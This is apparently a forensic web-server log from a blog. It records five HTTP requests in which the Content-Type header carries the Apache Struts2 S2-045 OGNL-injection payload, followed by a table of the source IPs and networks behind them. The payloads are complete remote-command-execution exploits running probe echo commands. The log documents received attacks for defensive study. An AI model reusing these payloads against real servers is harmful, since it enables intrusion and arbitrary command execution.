blog.cyberwar.nl-forensic.log:+24880:5980d5ad:0|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+10800:59856d66:8e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+9129:59a7931c:79|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+15241:59a9759d:61|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+7914:59ba06d2:e9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Aman4Wolves').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|Host:blog.cyberwar.nl

The requests were received from the following IPs:

AS      | IP               | AS Name
2875    | 159.93.36.250    | JINR-AS JINR/HEPNET, RU
4134    | 122.225.98.178   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 182.148.123.59   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 218.94.37.42     | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 220.191.231.222  | CHINANET-BACKBONE No.31,Jin-rong Street, CN
9381    | 223.255.145.158  | WTT-AS-AP WTT HK Limited, HK
18978   | 23.244.78.26     | ENZUINC-US - Enzu Inc, US
37963   | 114.215.47.133   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.27.240.44    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.76.41.162    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.77.179.38    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.41.72.189    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.42.147.64    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 123.57.148.247   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
59019   | 120.92.84.17     | BJKSCNET Beijing Kingsoft Cloud Internet Technology Co., Ltd, CN
134764  | 116.31.125.127   | CT-FOSHAN-IDC CHINANET Guangdong province network, CN

EOF